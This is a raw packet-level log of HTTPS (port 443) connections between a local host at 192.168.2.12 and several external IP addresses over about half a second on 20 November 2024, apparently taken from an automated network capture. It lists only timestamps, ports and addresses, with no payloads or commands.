                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.408816099 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.409091949 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.414572001 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.414630890 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.419230938 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.419270039 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.420909882 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.420984983 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.421019077 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.450427055 CET44349732104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.450517893 CET44349732104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.450524092 CET49732443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.450547934 CET44349732104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.450637102 CET44349732104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.450639963 CET49732443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.450691938 CET49732443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.451581955 CET49732443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.451596975 CET44349732104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.460170984 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.460220098 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.460308075 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.460323095 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.460494041 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.465353012 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.468096972 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.478980064 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.479022980 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.479129076 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.479140043 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.479331970 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.486841917 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.491482019 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.491564035 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.494756937 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.494828939 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.494877100 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.494895935 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.495049953 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.495824099 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.495903969 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.502659082 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.502736092 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.502811909 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.506120920 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.506248951 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.513633966 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.513732910 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.513748884 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.515837908 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.515908957 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.519001961 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.519149065 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.519220114 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.521450043 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.521694899 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.521760941 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.521763086 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.521769047 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.521780014 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.522815943 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.522885084 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.523255110 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.523330927 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.523494959 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.523507118 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.524732113 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.524826050 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.529462099 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.529643059 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.529653072 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.530456066 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.530515909 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.536287069 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.536349058 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.537120104 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.537194014 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.537647009 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.537662983 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.539406061 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.539467096 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.542817116 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.542916059 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.545768976 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.545835018 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.545847893 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.545864105 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.545907021 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.546271086 CET49730443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.546284914 CET44349730104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.547022104 CET4434973534.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.547403097 CET4434973534.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.547462940 CET49735443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.549501896 CET49735443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.549510956 CET4434973534.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.562779903 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.562794924 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.575401068 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.596018076 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.596234083 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.596256971 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.605700016 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.605746984 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.605811119 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.605832100 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.605918884 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.612535000 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.612575054 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.612670898 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.612932920 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.612945080 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.613833904 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614039898 CET49741443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614069939 CET44349741104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614137888 CET49741443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614367962 CET49742443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614379883 CET44349742104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614428997 CET49742443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614901066 CET49741443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.614913940 CET44349741104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.615053892 CET49742443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.615062952 CET44349742104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.616723061 CET49743443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.616734028 CET44349743104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.616782904 CET49743443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.617280960 CET49743443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.617291927 CET44349743104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.619513988 CET49744443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.619546890 CET44349744104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.619659901 CET49744443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.620270967 CET49745443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.620304108 CET44349745104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.620387077 CET49745443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.620625973 CET49744443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.620640993 CET44349744104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.620867014 CET49745443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.620879889 CET44349745104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.621900082 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.621951103 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.621984959 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.621999025 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.622168064 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.630040884 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.638192892 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.638264894 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.638293982 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.646303892 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.646774054 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.646800995 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.657629967 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.657740116 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.657763958 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.665862083 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.665985107 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.666007042 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.669639111 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.669680119 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.669789076 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.671370029 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.671380997 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.682106972 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.682172060 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.682183027 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.686904907 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.686959028 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.686966896 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.698263884 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.698450089 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.698457956 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.707381964 CET44349738104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.707652092 CET49738443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.707669020 CET44349738104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.708781004 CET44349738104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.708841085 CET49738443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.709995985 CET49738443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.710064888 CET44349738104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.710171938 CET49738443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.710179090 CET44349738104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.744775057 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.744904041 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.744960070 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.744976997 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.745028019 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.745055914 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.745100021 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.745109081 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.745146036 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.748274088 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.753401041 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.761893034 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.761943102 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.761976957 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.761997938 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.762038946 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.763847113 CET49738443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.797889948 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.797935009 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.798000097 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.798203945 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.798223972 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.814517021 CET49748443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.814560890 CET4434974834.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.814838886 CET49748443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.815330029 CET49748443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.815340042 CET4434974834.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.825510025 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.825841904 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.825975895 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.826003075 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.832717896 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.832818985 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.832827091 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.832923889 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.833189011 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.833210945 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.868324995 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.872481108 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.872551918 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.872575045 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.917414904 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.945768118 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.951240063 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.951288939 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.951308012 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.956171989 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.956249952 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.956262112 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.972022057 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.972089052 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.972099066 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.972110987 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.972198009 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.979929924 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.988023996 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.988080978 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.988096952 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.988111973 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.988162041 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.995970011 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.004185915 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.004364967 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.004379988 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010579109 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010675907 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010715008 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010732889 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010747910 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010756969 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010792971 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010802984 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.010864019 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.011828899 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.011913061 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.011930943 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.013658047 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.019306898 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.019372940 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.019387007 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.022480965 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.022531033 CET49737443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.022547007 CET44349737104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.026854038 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.026949883 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.026963949 CET44349736104.16.102.112192.168.2.12
